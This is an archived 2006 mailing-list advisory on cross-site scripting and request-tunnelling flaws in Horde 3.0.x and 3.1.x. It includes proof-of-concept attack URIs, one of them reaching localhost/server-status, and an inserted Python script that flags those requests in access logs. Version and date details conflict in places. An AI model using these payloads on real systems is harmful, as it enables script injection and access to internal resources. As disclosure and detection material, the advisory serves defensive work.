[Full-disclosure] Public Advisory: Horde 3.1.1, 3.0.10 Multiple Security Issues

From: security at moritz-naumann.com
Date: Wed Jul 05 2006 - 16:43:30 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SA0011

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

PUBLISHED ON
  July 05, 2006

PUBLISHED AT
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
  http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg

PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc

AFFECTED APPLICATION OR SERVICE
  Horde Application Framework
  http://www.horde.org

  The Horde Framework is a common code-base used by Horde
  applications, including libraries and a common user interface.
  The best known Horde application to date is probably IMP, a
  web-based IMAP/SMTP client.

AFFECTED VERSIONS
  Version 3.0.0 up to and including 3.0.10
  Version 3.1.0 up to and including 3.1.1
  Versions below 3.0.0 have not been examined.

ISSUES
  Horde is subject to multiple security vulnerabilities, ranging from
  information disclosure to client side script injection (cross site
  scripting) issues.

  +++++ 1. Cross Site Scripting #1
  Horde is subject to a client side script injection vulnerability in
  the URL redirection (dereferrer) function.

  By accessing the following (partial) URI on a web site running an
  affected version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);

  This problem is caused by insufficient validation of user supplied
  input. It is only known to be exploitable on Internet Explorer 6
  (tested on v6.2900.2180 including all patches on Windows XP SP2).
  Internet Explorer 7 beta 3 is not affected.

  +++++ 2. Cross Site Scripting #2
  Horde is subject to a client side script injection vulnerability in
  the help function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 3. Cross Site Scripting #3
  Horde is subject to a client side script injection
  vulnerability in the problem reporting function.

  By accessing the following (partial) URI on a web site running a
  vulnerable version with a web browser which is prone to this issue,
  client side script code will be injected into the output generated
  by the application:

  [Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22

  This problem is caused by insufficient validation of user supplied
  input. All common modern browsers providing Javascript support are
  assumed to be prone to this issue.

  +++++ 4. Cross Site Scripting #4, Web tunneling behaviour
  Horde is subject to a server side issue which allows HTTP GET
  requests to be tunnelled through the application and remotely
  hosted web script to be injected into the output generated by the
  application.

  This behaviour allows for accessing arbitrary locations which are
  addressable using URIs starting with the 'http://', 'https://' or
  'ftp://' protocol handlers. These locations will be accessible from
  within the security context of the web server running an affected
  version of the application. As a result, an attacker may be able to
  access remote locations s/he would not otherwise have access to,
  without disclosing the real source of the request [1]. Additionally,
  insufficiently access restricted local (server-side) or remote (3rd
  party) locations may become available [2].

  By tricking a victim into starting a tunnelling call to a previously
  prepared malicious HTML file, stored in a remote location, which
  contains web script which may be executed on the client side, it is
  possible to extend this into a script injection issue. The injected
  script would be executed by the client within the context of the
  domain the vulnerable web application is hosted in. [3] All common
  modern browsers providing Javascript support are assumed to be prone
  to this issue.

  By accessing the following (partial) URIs on a web site running a
  vulnerable version with a web browser, the behaviours described
  above may be triggered:

  [1] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
  [2] [Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
  [3] [Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html
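
  A log-triage sketch for the four issues above, added here as an example and not part of the original advisory or of Horde's code: it decodes request targets from web server access logs and labels those that match each issue's request shape. It assumes common/combined log format and /horde as [Base_URI]; the log lines are constructed and the function names are hypothetical.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit
# Constructed access-log lines (assumption: /horde stands in for [Base_URI]).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2006:10:00:01 +0200] "GET /horde/services/go.php?url=http://./;URL=javascript:alert(0); HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Jul/2006:10:00:02 +0200] "GET /horde/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E HTTP/1.1" 200 900',
    '192.0.2.11 - - [05/Jul/2006:10:00:03 +0200] "GET /horde/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22 HTTP/1.1" 200 700',
    '192.0.2.12 - - [05/Jul/2006:10:00:04 +0200] "GET /horde/services/go.php?untrusted=1&url=http://localhost/server-status HTTP/1.1" 200 4096',
    '192.0.2.13 - - [05/Jul/2006:10:00:05 +0200] "GET /horde/services/go.php?url=http://www.horde.org/ HTTP/1.1" 302 0',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"]')  # characters that break out of an HTML attribute or tag

def params(query):
    out = {}
    for pair in query.split("&"):  # '&' only, so ';' stays inside the value
        key, _, value = pair.partition("=")
        out.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return out

def internal_target(url):
    # True when a tunnelled URL points at localhost or a private/loopback IP.
    try:
        host = urlsplit(url).hostname or ""
        return host == "localhost" or ipaddress.ip_address(host).is_private
    except ValueError:  # malformed URL, or a host name rather than an IP literal
        return False

def classify(target):
    # Return the advisory issue labels that a decoded request target matches.
    parts, found = urlsplit(target), []
    q = params(parts.query)
    if parts.path.endswith("/services/go.php"):
        for url in q.get("url", []):
            if "javascript:" in url.lower() or ";url=" in url.lower():
                found.append("issue1-dereferrer-xss")
            if "untrusted" in q:
                found.append("issue4-tunnel-internal" if internal_target(url) else "issue4-tunnel")
    elif "/services/help/" in parts.path and any(map(MARKUP_RE.search, q.get("module", []))):
        found.append("issue2-help-xss")
    elif parts.path.endswith("/services/problem.php") and any(map(MARKUP_RE.search, q.get("name", []))):
        found.append("issue3-problem-xss")
    return found

def scan(lines):
    # Return (line_number, labels) for every log line that matches an issue.
    targets = ((n, REQUEST_RE.search(line)) for n, line in enumerate(lines, 1))
    hits = ((n, classify(m.group(1))) for n, m in targets if m)
    return [(n, labels) for n, labels in hits if labels]
```

  Every `untrusted=1` request is labelled as tunnelling, so on a host where that parameter sees legitimate use the `issue4-tunnel` hits need review against the target host rather than being treated as confirmed abuse.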

BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes
  the injection of malicious content into output produced
  by a web application. A common attack vector is the
  inclusion of arbitrary client side script code into the
  application's output. Failure to completely sanitize user
  input from malicious content can cause a web application
  to be vulnerable to Cross Site Scripting.

  http://www.owasp.org/index.php/Cross_Site_Scripting
  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml

WORKAROUNDS
  Issues 1-3:
    Client: Disable Javascript.
    Server: Prevent access to vulnerable file(s).
  Issues 1-3:
    Client: Use application as intended only.
    Server: Prevent access to vulnerable file(s).

SOLUTIONS
  The Horde project has released versions 3.1.2 and 3.1.11 today.
  These are supposed to fix all of the above issues. The updated
  packages are available at http://horde.org/

TIMELINE
  Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
  Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
  Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
  Jul 05, 2005 Issues 1-4: Public advisory

NOTES
  This is not related to CVE-2006-2195.

REFERENCES
  Developers' release announcements
  v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html
  v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html

ADDITIONAL CREDIT
  N/A

LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
31jDwhWrNKdtHXmsdcM1bAk=
=ENdh
-----END PGP SIGNATURE-----